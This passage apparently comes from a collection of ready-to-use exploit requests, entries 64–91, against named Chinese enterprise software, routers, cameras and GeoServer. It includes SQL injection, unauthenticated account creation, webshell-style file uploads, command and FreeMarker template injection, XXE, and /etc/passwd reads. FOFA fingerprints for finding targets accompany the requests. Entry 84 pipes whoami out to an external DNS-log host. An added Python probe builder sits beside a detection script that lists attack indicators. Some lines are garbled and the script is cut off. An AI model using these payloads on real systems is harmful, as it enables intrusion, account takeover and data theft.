Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
Time-based blind injection through the sId element of the GetOSpById SOAP operation; a response delayed by about 5 seconds confirms it.
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
The addOperators function of SystemMng.ashx can be called without a session. A 200 response means the account test123456 / 123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 (Wanhu ezOFFICE) SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The injection is confirmed when lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the MD5 of 102103122 rendered by the UNION column.

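Entries 57, 58 and 66 all use the same SQL Server trick: make the server compute a value the tester chose (an MD5 of a seed, or @@version), then force it into an int/string comparison so the conversion error echoes it, or render it through a UNION column. The following Python is an added example, not code from the original post or from Chanjet or Wanhu, that builds the three probe tails and recognises the marker in a response. The base URL, path and parameter names it takes are placeholders, and the sample responses in the main block are constructed.

```python
import hashlib
import re
from typing import Optional
from urllib.parse import quote


def expected_marker(seed: str) -> str:
    """Hex MD5 of the seed, i.e. what hashbytes('MD5', seed) computes server-side.
    fn_varbintohexstr() and fn_sqlvarbasetostr() both render it as '0x' + this."""
    return hashlib.md5(seed.encode()).hexdigest()


def probe_tail(shape: str, seed: str) -> str:
    """Injection suffix for the three probe shapes in this section. 'string' and
    'paren' force an int/string comparison so SQL Server raises a conversion
    error that echoes the string operand; 'union' renders it via a UNION column."""
    expr = f"sys.fn_varbintohexstr(hashbytes('MD5','{seed}'))"
    tails = {
        "string": f"' AND 1=(SELECT {expr})--",                            # keyEdit.aspx  KeyID=1'...
        "paren": f"') AND 1 IN (SELECT {expr})--",                         # KeyInfoList.aspx  zt=')...
        "union": f"' UNION ALL SELECT {expr},NULL,NULL,NULL,NULL,NULL--",  # SendFileCheckTemplateEdit.jsp  RecordID=1'...
    }
    return tails[shape]


def probe_url(base: str, path: str, param: str, shape: str, seed: str, extra: str = "") -> str:
    """Assemble the GET URL; base, path and param are whatever the target uses (placeholders here)."""
    return f"{base}{path}?{param}=1{quote(probe_tail(shape, seed), safe='')}{extra}"


# SQL Server's conversion-failure text as surfaced by ASP.NET / JSP error pages.
CONVERSION_ERROR = re.compile(
    r"Conversion failed when converting the n?varchar value '(?P<leak>[^']*)' to data type int",
    re.I,
)


def extract_leak(body: str) -> Optional[str]:
    """The string operand SQL Server echoed back (e.g. @@version in entry 57), or None."""
    m = CONVERSION_ERROR.search(body)
    return m.group("leak") if m else None


def confirms_injection(body: str, seed: str) -> bool:
    """True when the response carries the chosen marker, whether inside the
    conversion error or rendered into the page by the UNION shape."""
    return expected_marker(seed) in body


if __name__ == "__main__":
    # Constructed responses standing in for real ones; nothing here touches the network.
    err = ("Conversion failed when converting the nvarchar value '0x"
           + expected_marker("123456") + "' to data type int.")
    print(probe_url("http://target", "/tplus/UFAQD/KeyInfoList.aspx", "zt", "paren", "123456", "&preload=1"))
    print(confirms_injection(err, "123456"))
    print(extract_leak("Conversion failed when converting the nvarchar value "
                       "'Microsoft SQL Server 2012' to data type int."))
```

Use a per-test random seed rather than 123456 in practice, so that a cached page or a WAF canned response cannot produce a false positive.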
67. 万户ezOFFICE (Wanhu ezOFFICE) wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and filename give the name of the written file, dir its directory (traversal is not filtered) and fileType its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE (Wanhu ezOFFICE) wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
The ;.js suffix is a servlet path-parameter trick: the login filter sees a .js static resource, while Tomcat strips the ;-segment and still serves the JSP. recordId then reaches a SQL Server query; a 5-second delay confirms the injection.
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户ezOFFICE (Wanhu ezOFFICE) contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
Same ;.js filter bypass as entry 68; gd_startUserCode is the injection point and a 5-second delay confirms it.
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP (Wanhu ezEIP) success.aspx command execution
FOFA: app="万户网络-ezEIP"
__VIEWSTATE carries the deserialization PAYLOAD; the command itself is passed base64-encoded in the SID header (dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini).
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
Time-based blind injection in accId; a 5-second delay confirms it.
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA (Seeyon OA) getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
xmlValue is URL-encoded XML whose DOCTYPE declares an external entity xxe pointing at file:///c:/windows/win.ini and references it as &xxe; inside the Field's VALUE element; the parser resolves the entity and the file content comes back in the response.
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server (Seeyon M3) 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
The time parameter of setSyncTimeHost is passed to a shell; the backticks run ifconfig and write its output into the cgi-bin directory.
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the output:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) 掌上校园服务管理平台 service.action remote command execution
FOFA: title="掌上校园服务管理平台"
FreeMarker template injection: UnitCode is rendered as a template, and freemarker.template.utility.Execute runs the command, which writes a marker file under webapps/ROOT.
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then fetch the marker file:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
The folder field chooses the target directory and the Filedata file name (1.aspx) is kept as-is.
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog/
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
The target field chooses the directory the file is written to.
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then fetch the uploaded file:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA: BYTEVALUE 智能流控路由器
The path parameter reaches a shell unescaped; the pipe runs id and its output is returned in the response.
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
The report parameter is the output file name, traversal included; the raw request body is written to it.
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 32
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then fetch the written JSP:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) 视频监控 main-cgi password disclosure
FOFA: app="uniview-视频监控"
Unauthenticated request (empty user name, login handle -1); the JSON response lists the device's user accounts together with their passwords.
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
z2 is interpolated into a shell command inside double quotes; the value "|id;" closes the quote and pipes into id.
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
The command to execute is taken from the Cmd header; PAYLOAD is the JSON body of the connection-test request.

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
The sql field is rendered as a FreeMarker template before it is used, so freemarker.template.utility.Execute gives command execution; the DNS lookup carries the whoami result out of band.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami`\")}",
  "type": "0"
}

85. SysAid On-Premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
accountId is a path traversal into tomcat/webapps; the exploit request below drops a Godzilla (哥斯拉) webshell there.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Shell URL: http://x.x.x.x/userfiles/index.jsp

86. TOSEI (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
The host parameter is passed to a shell; %0a terminates the ping command so cat runs as a separate command, and ${IFS} stands in for a space.
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

/ `3 }4 Z1 y' i87. 安恒明御安全网关aaa_local_web_preview文件上传
- v: z( a4 d+ c2 v" u/ M, F4 QFOFA:title="明御安全网关"- `# T9 c. K( R3 g& e* j+ ]' H
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.14 R$ _: x" Z8 M6 g6 [4 v
Host: X.X.X.X
, r1 B/ s( }) j$ h V2 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 L0 R/ d* L* k# ~% N7 e5 p4 I, Q& NConnection: close5 q$ i8 G6 t* e6 d1 s/ y
Content-Length: 198' w; r$ t& \8 B+ H j$ @% K y) g
Accept-Encoding: gzip$ }4 u; Y/ C' G i4 M' Z( n: n
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
3 X. c% B6 I& O- ]; B# ?* A' L
+ @4 G: g Z1 ~--qqobiandqgawlxodfiisporjwravxtvd1 |& B7 ]- H8 l" c" c
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
. j$ g! O" X4 Q9 ~3 p; l- Y5 V) bContent-Type: text/plain
; i; Z3 _: J0 g- I% q$ e6 O2 U6 r# D. q! n+ C# @! r# D
2ZqGNnsjzzU2GBBPyd8AIA7QlDq/ f. p; L" M# R# E- D
--qqobiandqgawlxodfiisporjwravxtvd--
, M% o! V& r/ I4 W9 K
4 @/ X* X5 R: S+ `$ N; v) u8 o& a% G
/jfhatuwe.php, a0 Y0 J$ R E6 g' X
5 g/ K. V. d6 A' L8 i5 n
88. 安恒明御安全网关 (DBAppSecurity MingYu security gateway) aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
type is injected into a shell command. Decoded, the value is a newline followed by echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php, which writes a PHP file into the web UI directory.
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Then request /txzfsrur.php (the file written by the command above) and look for the marker string.

89. 致远互联FE协作办公平台 (Seeyon FE) editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
The URL ends in .js%70: a filter that matches on the raw URI sees a .js resource and lets it through, while the container decodes it to editflow_manager.jsp. The response containing 24642 (111*222) confirms the injection.
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
The jsondata[ip] value of ping.php reaches a shell unescaped; the output of the injected command is returned in the JSON response.
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 47
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

" G% n' h' F! g5 g! {91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
& Q* L. D1 I- J' C' ~FOFA:title="综合安防管理平台"9 I" p2 }5 [) R
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
2 ]3 P9 A) `0 x6 ~+ _9 ~3 EHost: your-ip8 C8 i9 a% l7 A6 b1 V9 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
" n9 b8 N! c9 N% `$ j+ I# M |; pAccept-Encoding: gzip, deflate+ t$ X) d) i! N, a+ l# c; _
Accept: */*
* q& b9 L& k1 fConnection: keep-alive& b2 }+ W. ]3 l1 Q: ], K& r
+ j9 F0 w/ Q" S- Z4 b/ | l/ k
2 P! L7 G8 D4 ?/ r
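Most of the requests in entries 57 through 91 leave recognisable indicators in the request line or body: SQL Server time delays and hash oracles, FreeMarker ?new() object construction, Tomcat path-parameter tricks (;.js, .js%70, ..;/), shell metacharacters directly after an = sign, external DTD entities, base64-wrapped SQL and ../ traversal. The Python below is an added example, not from the original post or from any product named above, that scans request records for those indicators so they can be hunted in proxy or WAF logs. The sample records are constructed from the POCs in this section and the rule names are my own; each rule is tried on both the raw and the URL-decoded text because some tricks (.js%70) are only visible raw and others (%0a, %3C%21ENTITY) only decoded.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote, unquote_plus

# (name, pattern); the trailing comments name the entries each rule was derived from.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("mssql_time_delay", re.compile(r"waitfor\s+delay", re.I)),                                     # 64, 68, 69, 71
    ("mssql_hash_oracle", re.compile(r"hashbytes\s*\(|fn_varbintohexstr|fn_sqlvarbasetostr", re.I)),  # 58, 66
    ("freemarker_execute", re.compile(r"<#assign\b.*?\?new\(\)|freemarker\.template\.utility\.Execute", re.I | re.S)),  # 76, 84
    ("servlet_path_bypass", re.compile(r";\.js\b|\.\.;/|\.js%70", re.I)),                           # 68, 69, 89, 91
    ("shell_metachar", re.compile(r'="?(?:\|{1,2}|`|\n)')),                                         # 62, 75, 79, 82, 86, 88
    ("xxe_external_entity", re.compile(r"<!ENTITY\s+\S+\s+SYSTEM", re.I)),                          # 72
    ("path_traversal", re.compile(r"(?:^|[=/])\.\./")),                                             # 63, 67, 80, 85, 87, 91
]

SQL_VERB = re.compile(r"^\s*(?:select|union|insert|update|delete|drop|exec)\b", re.I)


def decoded_sql_param(text: str) -> Optional[str]:
    """Entry 60 hides the statement in a base64 sql= parameter. Return the decoded
    statement when it reads as SQL, otherwise None."""
    m = re.search(r"[?&]sql=([A-Za-z0-9+/=%]+)", text)
    if not m:
        return None
    try:
        stmt = base64.b64decode(unquote(m.group(1)), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError: not base64 at all
        return None
    return stmt if SQL_VERB.match(stmt) else None


def scan_request(request_line: str, body: str = "") -> List[str]:
    """Sorted indicator names that fire on one request (line plus optional body)."""
    raw = request_line + "\n" + body if body else request_line
    decoded = unquote_plus(raw)
    hits = {name for name, rx in RULES if rx.search(raw) or rx.search(decoded)}
    if decoded_sql_param(raw) is not None:
        hits.add("base64_sql_param")
    return sorted(hits)


def scan_records(records: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run scan_request over {'line': ..., 'body': ...} records; return (index, hits) for matches."""
    out = []
    for i, rec in enumerate(records):
        hits = scan_request(rec["line"], rec.get("body", ""))
        if hits:
            out.append((i, hits))
    return out


# Constructed sample records, trimmed from the POCs in this section; the last one is benign.
SAMPLE_RECORDS: List[Dict[str, str]] = [
    {"line": "GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1"},
    {"line": "GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1"},
    {"line": "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1"},
    {"line": "POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1",
     "body": '{"sql": "<#assign ex=\\"freemarker.template.utility.Execute\\"?new()>${ex(\\"id\\")}", "type": "0"}'},
    {"line": "POST /cgi-bin/network_test.php HTTP/1.1", "body": "host=%0acat${IFS}/etc/passwd%0a&command=ping"},
    {"line": "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1"},
    {"line": "POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1",
     "body": "xmlValue=%3C%21DOCTYPE+foo+%5B%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22%3E%5D%3E"},
    {"line": "GET /index.html HTTP/1.1"},
]

if __name__ == "__main__":
    for idx, hits in scan_records(SAMPLE_RECORDS):
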